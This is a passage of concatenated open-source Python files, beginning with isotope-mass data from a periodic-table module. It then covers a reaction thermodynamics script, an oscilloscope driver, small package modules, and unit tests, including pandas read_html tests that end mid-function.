178.953816017, 179.952378803, 180.953244, 181.952110186, 182.953126102,
183.952489071, 184.954042265, 185.953838158, 186.955750458, 187.955838228,
188.95814747, 189.958447048, 190.960929718, 191.96148069, 192.964151563,
193.965182083, 194.968126661, 195.969639333, 192.96292643, 163.992201,
164.987520, 165.985824, 166.981665156, 167.979881, 168.976294942, 169.974965,
170.971626042, 171.970456, 172.967501739, 173.966861045, 174.964112895,
175.963648688, 176.9613015, 177.961082, 178.959122266, 179.959229446,
180.957625297, 181.958076296, 182.956846458, 183.957476, 184.956698,
185.957946104, 186.957363361, 187.958853121, 188.958718935, 189.960545968,
190.960594046, 191.962605012, 192.96292643, 193.965078378, 194.965979573,
195.968396542, 196.969653285, 197.972280, 198.973804583, 194.964791134,
165.994855, 166.992979, 167.988150742, 168.986715, 169.982495289,
170.981244542, 171.977347128, 172.976444754, 173.972818767, 174.972420552,
175.968944622, 176.968469481, 177.965648724, 178.965363404, 179.963031477,
180.963097285, 181.961170656, 182.961596703, 183.959922251, 184.960619,
185.959350813, 186.960587, 187.959395391, 188.960833686, 189.959931655,
190.961676661, 191.961038005, 192.962987401, 193.962680253, 194.964791134,
195.964951521, 196.967340182, 197.96789279, 198.970593094, 199.971440677,
200.974512868, 201.975740, 196.966568662, 168.998080, 169.996122,
170.991878881, 171.990035, 172.98623738, 173.984761, 174.981274107,
175.980099, 176.976864908, 177.97603192, 178.973212812, 179.972521124,
180.970079048, 181.969617874, 182.967593034, 183.967451524, 184.965789411,
185.965952703, 186.964567541, 187.965323661, 188.963948286, 189.964700339,
190.963704225, 191.964812953, 192.964149715, 193.96536525, 194.96503464,
195.966569813, 196.966568662, 197.968242303, 198.968765193, 199.970725647,
200.97165724, 201.973805838, 202.975154542, 203.977724, 204.979870,
201.970643011, 171.003760, 171.998832686, 172.997242, 173.992863695,
174.99142327, 175.98735458, 176.986279158, 177.982483143, 178.981833861,
179.978266394, 180.977819311, 181.974689964, 182.974449841, 183.971713051,
184.971899086, 185.96936179, 186.969814236, 187.967577049, 188.968190034,
189.966322449, 190.967157105, 191.965634327, 192.966665421, 193.965439409,
194.966720113, 195.965832649, 196.967212908, 197.966769032, 198.968279932,
199.968326004, 200.970302268, 201.970643011, 202.972872484, 203.973493933,
204.976073386, 205.977514066, 206.982588545, 207.985940, 208.991040,
209.994510, 204.974427541, 176.000590, 176.996427286, 177.994897,
178.991089082, 179.989906, 180.986257447, 181.985667104, 182.982192802,
183.981873122, 184.978791305, 185.978325, 186.975905897, 187.976009782,
188.973588428, 189.973877149, 190.971786154, 191.972225, 192.970672,
193.9712, 194.969774335, 195.970481151, 196.969574511, 197.970483495,
198.969877, 199.970962672, 200.970818891, 201.972105808, 202.97234422,
203.973863522, 204.974427541, 205.97611032, 206.977419429, 207.9820187,
208.985358952, 209.990073689, 210.993477, 211.998228, 207.976652071,
178.003830191, 179.002150, 179.997918173, 180.996623958, 181.992671842,
182.991874629, 183.988142339, 184.987609944, 185.984238945, 186.98391837,
187.980874338, 188.980807, 189.978081517, 190.978265, 191.975785171,
192.976173234, 193.97401207, 194.97454205, 195.972774109, 196.973431124,
197.972033959, 198.97291665, 199.971826675, 200.972884511, 201.972159133,
202.973390521, 203.973043589, 204.974481755, 205.974465278, 206.975896887,
207.976652071, 208.98109012, 209.984188527, 210.988736964, 211.991897543,
212.996581499, 213.999805408, 215.004807, 208.980398734, 184.001124,
184.997625, 185.996597625, 186.993157835, 187.992265154, 188.989199012,
189.988295129, 190.985786119, 191.985457954, 192.982959771, 193.98283396,
194.980650737, 195.980666509, 196.978864454, 197.979206, 198.977671961,
199.978131829, 200.977009036, 201.977742324, 202.976876001, 203.977812736,
204.977389366, 205.97849913, 206.978470679, 207.979742196, 208.980398734,
209.984120371, 210.98726946, 211.991285724, 212.994384666, 213.998711539,
215.001769776, 216.006305943, 217.009470, 218.014316, 208.982430435,
187.999422048, 188.998480562, 189.995101185, 190.994574485, 191.991335149,
192.991025275, 193.988185606, 194.988110728, 195.98553458, 196.98565963,
197.983388616, 198.983666063, 199.981798604, 200.982259764, 201.980757541,
202.981420103, 203.980318121, 204.981203322, 205.980481099, 206.981593173,
207.981245702, 208.982430435, 209.982873673, 210.986653154, 211.988867969,
212.99285728, 213.99520135, 214.999419988, 216.001915035, 217.006334796,
218.008973037, 219.013744, 220.016602, 210.987496271, 192.999843112,
193.998725085, 194.996268098, 195.995788077, 196.993189215, 197.992837202,
198.990532254, 199.990351264, 200.988416999, 201.988630236, 202.986941984,
203.987251326, 204.986074483, 205.986667036, 206.985783502, 207.986589977,
208.986173143, 209.98714771, 210.987496271, 211.990744771, 212.992936646,
213.996371733, 214.99865257, 216.002423257, 217.004718822, 218.008694336,
219.011161691, 220.015407682, 221.018050, 222.022330, 223.025190,
222.017577738, 195.005437696, 196.002115223, 197.001584351, 197.998678663,
198.998370297, 199.9956993, 200.995628335, 201.993263492, 202.993386687,
203.99142874, 204.991718799, 205.990214104, 206.990734225, 207.98964247,
208.990414742, 209.989696216, 210.990600523, 211.990703529, 212.993882668,
213.995362554, 214.998745483, 216.00027437, 217.003927675, 218.005601256,
219.009480204, 220.011393981, 221.015536782, 222.017577738, 223.021790,
224.024090, 225.028440, 226.030890, 227.035407, 228.037986, 222.01755173,
199.007258147, 200.00657249, 201.003860867, 202.003372847, 203.000924647,
204.000653204, 204.99859396, 205.998666066, 206.996949414, 207.997138783,
208.995953555, 209.996407738, 210.995536544, 211.996202244, 212.996189081,
213.998971145, 215.000341497, 216.00319799, 217.004631951, 218.007578322,
219.009252149, 220.012327405, 221.014254762, 222.01755173, 223.019735857,
224.023249951, 225.025565414, 226.029386231, 227.031835938, 228.035729,
229.038450228, 230.042510, 231.045440, 232.049772, 228.031070292,
202.009890686, 203.009271619, 204.006499668, 205.00626857, 206.00382727,
207.003798105, 208.00183994, 209.001991373, 210.000494978, 211.000897987,
211.999794499, 213.000383959, 214.000107894, 215.002719834, 216.003533035,
217.006320327, 218.00714023, 219.010085078, 220.011028384, 221.013917338,
222.01537453, 223.018502171, 224.020211821, 225.023611564, 226.025409823,
227.029177842, 228.031070292, 229.034957577, 230.037056394, 231.041220,
232.043638, 233.048060, 234.050704, 227.027752127, 206.01450498,
207.011949748, 208.011551551, 209.009494863, 210.009435986, 211.007734835,
212.007813822, 213.006607643, 214.006901798, 215.006453625, 216.008720075,
217.009346914, 218.011641453, 219.012420389, 220.014762979, 221.015591248,
222.017843851, 223.019137468, 224.021722866, 225.023229585, 226.026098089,
227.027752127, 228.031021112, 229.033015243, 230.036294178, 231.038558786,
232.042027438, 233.044550, 234.048420, 235.051232, 236.055296,
232.038055325, 209.017715682, 210.015075342, 211.014928413, 212.012980288,
213.01301014, 214.01149977, 215.01173033, 216.011062115, 217.013114328,
218.013284499, 219.015536895, 220.015747762, 221.018183674, 222.018468121,
223.020811448, 224.021466895, 225.023951021, 226.024903069, 227.02770407,
228.028741127, 229.03176243, 230.033133843, 231.036304343, 232.038055325,
233.041581843, 234.04360123, 235.047510074, 236.049870, 237.053894,
238.056496, 231.03588399, 212.023204138, 213.02110934, 214.020918417,
215.019185865, 216.019109564, 217.018323986, 218.020041889, 219.019883143,
220.021875303, 221.021877983, 222.023742, 223.023962273, 224.025625738,
225.026130678, 226.027947753, 227.028805072, 228.031051376, 229.032096793,
230.034540754, 231.03588399, 232.038591592, 233.040247277, 234.043308058,
235.045443615, 236.048681284, 237.051145659, 238.05450271, 239.057260,
240.060980, 238.050788247, 217.024368791, 218.023535671, 219.02491916,
220.024723, 221.026399, 222.026086, 223.0277386, 224.027604778,
225.029390717, 226.029338702, 227.031156367, 228.031374006, 229.033505939,
230.033939784, 231.036293704, 232.037156152, 233.039635207, 234.040952088,
235.043929918, 236.045568006, 237.048730184, 238.050788247, 239.054293299,
240.056591988, 241.060330, 242.062931, 237.048173444, 225.033913933,
226.035145, 227.034956789, 228.036180, 229.036263808, 230.037827597,
231.038245085, 232.040108, 233.040740546, 234.042895038, 235.044063267,
236.0465696, 237.048173444, 238.050946405, 239.052939025, 240.056162182,
241.058252431, 242.06164118, 243.064279, 244.067850, 242.058742611,
228.038742328, 229.040150212, 230.039649886, 231.041101107, 232.041187097,
233.042997375, 234.043317076, 235.04528605, 236.046057964, 237.048409658,
238.049559894, 239.052163381, 240.053813545, 241.056851456, 242.058742611,
243.062003092, 244.064203907, 245.067747154, 246.070204627, 247.074070,
243.06138108, 231.045560, 232.046590, 233.046348, 234.047809, 235.047946,
236.049579, 237.049996, 238.051984324, 239.053024479, 240.055300179,
241.056829144, 242.059549159, 243.06138108, 244.064284847, 245.066452114,
246.069774619, 247.072093, 248.075752, 249.078480, 247.07035354,
233.050771232, 234.050159841, 235.051434, 236.051413, 237.052901,
238.053028697, 239.054957, 240.055529539, 241.057653001, 242.058835824,
243.061389114, 244.062752578, 245.065491249, 246.067223662, 247.07035354,
248.072348508, 249.075953413, 250.078356959, 251.082284605, 252.084870,
247.07030708, 235.056580, 236.057330, 237.057003, 238.058281, 239.058279,
240.059759, 241.060230, 242.061981, 243.063007572, 244.065180774,
245.066361616, 246.068672947, 247.07030708, 248.073086, 249.074986657,
250.07831652, 251.080760172, 252.084310, 253.086880, 254.090600,
251.079586788, 237.062070, 238.061410, 239.062422, 240.062302, 241.063726,
242.063701552, 243.065427, 244.066000689, 245.068048612, 246.068805309,
247.071000589, 248.072184861, 249.074853537, 250.076406066, 251.079586788,
252.081625846, 253.085133145, 254.087322909, 255.091046, 256.093440,
252.082978512, 240.068920, 241.068538, 242.069745, 243.069548, 244.070883,
245.071324, 246.072896, 247.073656, 248.075471, 249.076411, 250.078612,
251.079992142, 252.082978512, 253.084824697, 254.088022021, 255.090273122,
256.093598, 257.095979, 258.099520, 257.095104724, 242.073430, 243.074353,
244.074084, 245.075385, 246.075299023, 247.076847, 248.077194714,
249.079034, 250.079521264, 251.081575017, 252.082466855, 253.085185236,
254.08685422, 255.089962202, 256.091773117, 257.095104724, 258.097076,
259.100595, 260.102678, 258.098431319, 245.080829, 246.081886, 247.081635,
248.082823, 249.083013, 250.084420, 251.084839, 252.086560, 253.087280,
254.089656, 255.091082705, 256.094059025, 257.095541368, 258.098431319,
259.100509, 260.103652, 261.105721, 262.108865, 255.093241131, 248.086596,
249.087833, 250.087510, 251.089012, 252.088976521, 253.090678,
254.090955253, 255.093241131, 256.094282666, 257.09687719, 258.098207,
259.101031, 260.102643, 261.105749, 262.107301, 263.110552, 264.112345,
260.105504, 251.094360, 252.095371, 253.095210, 254.096454, 255.096681,
256.098629, 257.099555, 258.101814, 259.102901, 260.105504, 261.106883,
262.109634, 263.111293, 264.114038, 265.115839, 266.119305, 263.112547,
253.100689, 254.100184, 255.101340, 256.101166194, 257.102990,
258.103489, 259.105637, 260.106440, 261.108766556, 262.109925, 263.112547,
264.113985, 265.116704, 266.117956, 267.121529, 268.123644, 255.107398,
255.107398, 256.108127, 257.107722, 258.109231, 259.109610, 260.111300,
261.112056, 262.114084, 263.114988, 264.117404, 265.118601, 266.121029,
267.122377, 268.125445, 269.127460, 270.130712, 259.114500, 258.113168,
259.114500, 260.114422071, 261.116117, 262.116398, 263.118322, 264.118931,
265.121114693, 266.122065, 267.124425, 268.125606, 269.128755, 270.130329,
271.133472, 272.135158, 273.138220, 262.122892, 260.121970, 261.121664,
262.122892, 263.123035, 264.124604, 265.125147, 266.126942, 267.127650,
268.129755, 269.130694, 270.133616, 271.135179, 272.138032, 273.139618,
274.142440, 275.144250, 263.128558, 263.128558, 264.128394885, 265.130085,
266.130097, 267.131789, 268.132162, 269.134056, 270.134650, 271.137657,
272.139052, 273.141986, 274.143131, 275.145952, 276.147208, 277.149841,
265.136151, 265.136151, 266.137299, 267.137307, 268.138728, 269.139055,
270.140657, 271.141139, 272.143738, 273.144913, 274.147492, 275.148647,
276.151156, 277.152420, 278.154812, 279.156193, 281.162061, 267.144341,
268.143795, 269.145124, 270.144720, 271.146062, 272.146317, 273.148863,
274.149492, 275.152176, 276.153034, 277.155647, 278.156469, 279.158861,
280.159795, 281.162061, 272.153615, 272.153615, 273.153682, 274.155713,
275.156142, 276.158493, 277.159519, 278.161604, 279.162468, 280.164473,
281.165372, 282.167486, 283.168415, 283.171792, 277.163943, 278.164312,
279.166546, 280.167039, 281.169286, 282.169765, 283.171792, 284.172384,
285.174105, 283.176451, 283.176451, 284.178080, 285.178732, 286.180481,
287.181045, 285.183698, 285.183698, 286.183855, 287.185599, 288.185689,
289.187279, 287.191186, 287.191186, 288.192492, 289.192715, 290.194141,
291.194384, 292.199786, 289.198862, 290.198590, 291.200011, 292.199786,
291.206564, 291.206564, 292.207549, 293.214670, 293.214670]
el2mass = dict(zip(_temp_symbol, _temp_mass))
el2mass["GH"] = 0. # note that ghost atoms in Cfour have mass 100.
eliso2mass = dict(zip(_temp_iso_symbol, _temp_iso_mass)) # encompasses el2mass
eliso2mass["GH"] = 0. # note that ghost atoms in Cfour have mass 100. # encompasses el2mass
#eliso2mass["X0"] = 0. # probably needed, just checking
el2z = dict(zip(_temp_symbol, _temp_z))
el2z["GH"] = 0
z2mass = dict(zip(_temp_z, _temp_mass))
z2el = dict(zip(_temp_z, _temp_symbol))
z2element = dict(zip(_temp_z, _temp_element))
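# Hedged usage sketch of the lookup tables built above; the looked-up values
# are standard isotope data and are shown for illustration only.
if __name__ == "__main__":
    print(el2mass["H"])       # mass of the most abundant isotope, ~1.00782503
    print(el2z["C"])          # 6
    print(z2el[8])            # "O"
    print(eliso2mass["C13"])  # ~13.00335484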
| kratman/psi4public | psi4/driver/qcdb/periodictable.py | Python | gpl-2.0 | 78,237 | 0.013434 |
# -*- coding: utf-8 -*-
"""
calculate thermodynamics for Katja
"""
from component_contribution.kegg_reaction import KeggReaction
from component_contribution.kegg_model import KeggModel
from component_contribution.component_contribution import ComponentContribution
from component_contribution.thermodynamic_constants import R, default_T
import csv
import numpy as np
import uncertainties.unumpy as unumpy
def reaction2dG0(reaction_list):
'''
    Calculates the dG0 values for a list of reactions.
    Uses the component-contribution package (Noor et al.) to estimate
    the standard Gibbs free energy of reactions, based on the
    component-contribution approach and measured values (NIST and Alberty).
Arguments:
List of reaction strings
Returns:
Array of dG0 values and standard deviation of estimates
'''
cc = ComponentContribution.init()
Kmodel = KeggModel.from_formulas(reaction_list)
Kmodel.add_thermo(cc)
dG0_prime, dG0_std = Kmodel.get_transformed_dG0(pH=7.5, I=0.2, T=298.15)
dG0_prime = np.array(map(lambda x: x[0,0], dG0_prime))
dG0_prime = unumpy.uarray(dG0_prime, np.diag(dG0_std))
return dG0_prime
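# Hedged usage sketch (KEGG-style reaction strings; the compound IDs below
# are the standard KEGG identifiers for ATP hydrolysis):
#
#   dG0 = reaction2dG0(['C00002 + C00001 <=> C00008 + C00009'])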
def reaction2Keq(reaction_list):
'''
    Calculates the equilibrium constant of each reaction, using dG0.
    Arguments:
        List of reaction strings
    Returns:
        Array of K-equilibrium values
'''
dG0_prime = reaction2dG0(reaction_list)
Keq = unumpy.exp( -dG0_prime / (R*default_T) )
return Keq
def reaction2RI(reaction_list, fixed_conc=0.1):
'''
    Calculates the reversibility index (RI) of a reaction.
    The RI represents the fold-change in metabolite concentrations
    (starting from equal reactant concentrations) that would make the
    reaction reversible. That is, the higher the RI, the more irreversible
    the reaction. A convenient threshold for irreversibility is RI >= 1000,
    i.e. a 1000-fold change in metabolite concentrations is required in
    order to flip the reaction direction.
    Arguments:
        List of reaction strings
Returns:
Array of RI values
'''
keq = reaction2Keq(reaction_list)
sparse = map(lambda x: KeggReaction.parse_formula(x).sparse, reaction_list)
N_P = np.zeros(len(sparse))
N_S = np.zeros(len(sparse))
for i,s in enumerate(sparse):
N_P[i] = sum([v for v in s.itervalues() if v>0])
N_S[i] = -sum([v for v in s.itervalues() if v<0])
N = N_P + N_S
Q_2prime = fixed_conc**(N_P-N_S)
RI = ( keq*Q_2prime )**( 2.0/N )
return RI
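# Worked example (illustrative numbers): for a 1:1 reaction A <=> B with
# Keq = 1e6 and fixed_conc = 0.1, N_P = N_S = 1, so Q_2prime = 0.1**0 = 1
# and RI = (1e6 * 1)**(2.0/2) = 1e6 -- far above the RI >= 1000 threshold,
# i.e. effectively irreversible.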
if __name__ == "__main__":
reactions = csv.reader(open('CCMtbRxnsKEGG.txt', 'r'))
names = []
reaction_list = []
for row in reactions:
row = row[0].split(" ")
names.append(row[0].replace("'", ''))
reaction_list.append(row[1])
dG0 = reaction2dG0(reaction_list)
Keq = reaction2Keq(reaction_list)
RI = reaction2RI(reaction_list)
reversibility_index = dict(zip(names, RI))
f = open('reversibility_index.csv','w')
w = csv.writer(f)
for k,v in reversibility_index.iteritems():
w.writerow([k, v])
f.close() | KatjaT/Thermodynamics | katja_thermo.py | Python | mit | 3,325 | 0.010827 |
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2012-2017 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilent90000 import *
class agilentMSOX92804A(agilent90000):
"Agilent Infiniium MSOX92804A IVI oscilloscope driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', 'MSOX92804A')
super(agilentMSOX92804A, self).__init__(*args, **kwargs)
self._analog_channel_count = 4
self._digital_channel_count = 16
self._channel_count = self._analog_channel_count + self._digital_channel_count
self._bandwidth = 28e9
self._init_channels()
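# Hedged usage sketch (python-ivi style; the VISA resource string below is a
# placeholder, not a real instrument address):
#
#   import ivi
#   scope = ivi.agilent.agilentMSOX92804A("TCPIP0::192.168.1.100::INSTR")
#   print(scope._analog_channel_count)  # 4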
| alexforencich/python-ivi | ivi/agilent/agilentMSOX92804A.py | Python | mit | 1,692 | 0.004728 |
#! /usr/bin/python
# -*- coding: utf-8 -*-
from . import agent
# Import them to register agents.
from .rule_based import basic
__author__ = 'fyabc'
def get_agent_by_name(name):
return agent.Agent.AgentClasses[name]
__all__ = [
'get_agent_by_name',
]
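# Hedged usage sketch (the agent name is hypothetical; real names are the
# keys of agent.Agent.AgentClasses, populated when agent modules register):
#
#   AgentClass = get_agent_by_name('BasicRuleAgent')
#   my_agent = AgentClass()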
| fyabc/MiniGames | HearthStone2/MyHearthStone/ai/standard.py | Python | mit | 265 | 0 |
#!/usr/bin/env python
from ethereum.tools import tester
from ethereum.tools.tester import TransactionFailed
from pytest import fixture, mark, raises
@fixture(scope='session')
def testerSnapshot(sessionFixture):
sessionFixture.uploadAndAddToController('solidity_test_helpers/ReentrancyGuardHelper.sol')
ReentrancyGuardHelper = sessionFixture.contracts['ReentrancyGuardHelper']
return sessionFixture.createSnapshot()
@fixture
def testerContractsFixture(sessionFixture, testerSnapshot):
sessionFixture.resetToSnapshot(testerSnapshot)
return sessionFixture
def test_nonReentrant(testerContractsFixture):
ReentrancyGuardHelper = testerContractsFixture.contracts['ReentrancyGuardHelper']
assert ReentrancyGuardHelper.testerCanReentrant()
with raises(TransactionFailed):
ReentrancyGuardHelper.testerCanNotReentrant()
| AugurProject/augur-core | tests/libraries/test_reentrancy_guard.py | Python | gpl-3.0 | 855 | 0.005848 |
''' Provides a command line application for Bokeh.
The following subcommands are available:
'''
from __future__ import absolute_import
def _build_docstring():
global __doc__
from . import subcommands
for cls in subcommands.all:
__doc__ += "%8s : %s\n" % (cls.name, cls.help)
_build_docstring()
del _build_docstring
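# After _build_docstring() runs, __doc__ ends with one "    name : help" line
# per class in subcommands.all; each subcommand class is assumed to define
# `name` and `help`, as used in the format string above.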
| phobson/bokeh | bokeh/command/__init__.py | Python | bsd-3-clause | 340 | 0.005882 |
'''
Test ACS columns
'''
from tasks.util import shell
# TODO clean this up in a more general init script
try:
shell('createdb test')
except Exception:
pass
from nose.tools import with_setup
from tasks.us.census.lodes import WorkplaceAreaCharacteristicsColumns
from tests.util import runtask, setup, teardown
@with_setup(setup, teardown)
def test_wac_columns_run():
runtask(WorkplaceAreaCharacteristicsColumns())
| CartoDB/bigmetadata | tests/us/census/test_lodes.py | Python | bsd-3-clause | 423 | 0.004728 |
from functools import partial
from importlib import reload
from io import (
BytesIO,
StringIO,
)
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
from pandas.errors import ParserError
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
f"len(list1) == {len(list1)}, "
f"len(list2) == {len(list2)}"
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
@td.skip_if_no("html5lib")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, match="google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
@td.skip_if_no("html5lib")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=[td.skip_if_no("bs4"), td.skip_if_no("html5lib")]),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath("io", "data", "html", "spam.html")
self.spam_data_kwargs = {}
self.spam_data_kwargs["encoding"] = "UTF-8"
self.banklist_data = datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@pytest.mark.xfail(reason="Html file was removed")
@tm.network
def test_banklist_url_positional_match(self):
url = "https://www.fdic.gov/bank/individual/failed/banklist.html"
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
url, "First Federal Bank of Florida", attrs={"id": "table"}
)
with tm.assert_produces_warning(FutureWarning):
df2 = self.read_html(url, "Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
@pytest.mark.xfail(reason="Html file was removed")
@tm.network
def test_banklist_url(self):
url = "https://www.fdic.gov/bank/individual/failed/banklist.html"
df1 = self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "table"}
)
df2 = self.read_html(url, match="Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
@tm.network
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/master/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(
self.banklist_data, match=".*Florida.*", attrs={"id": "table"}
)
df2 = self.read_html(
self.banklist_data, match="Metcalf Bank", attrs={"id": "table"}
)
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, match=".*Water.*")
df2 = self.read_html(self.spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(self.spam_data, match=".*Water.*", skiprows="asdf")
def test_index(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, match=".*Water.*")
df2 = self.read_html(data2, match="Unit")
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, match=".*Water.*")
df2 = self.read_html(data, match="Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, match=".*Water.*")
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, match="Unit")
assert_framelist_equal(df1, df2)
@tm.network
def test_bad_url_protocol(self):
with pytest.raises(URLError, match="urlopen error unknown url type: git"):
self.read_html("git://github.com", match=".*Water.*")
@tm.network
@pytest.mark.slow
def test_invalid_url(self):
msg = (
"Name or service not known|Temporary failure in name resolution|"
"No tables found"
)
with pytest.raises((URLError, ValueError), match=msg):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
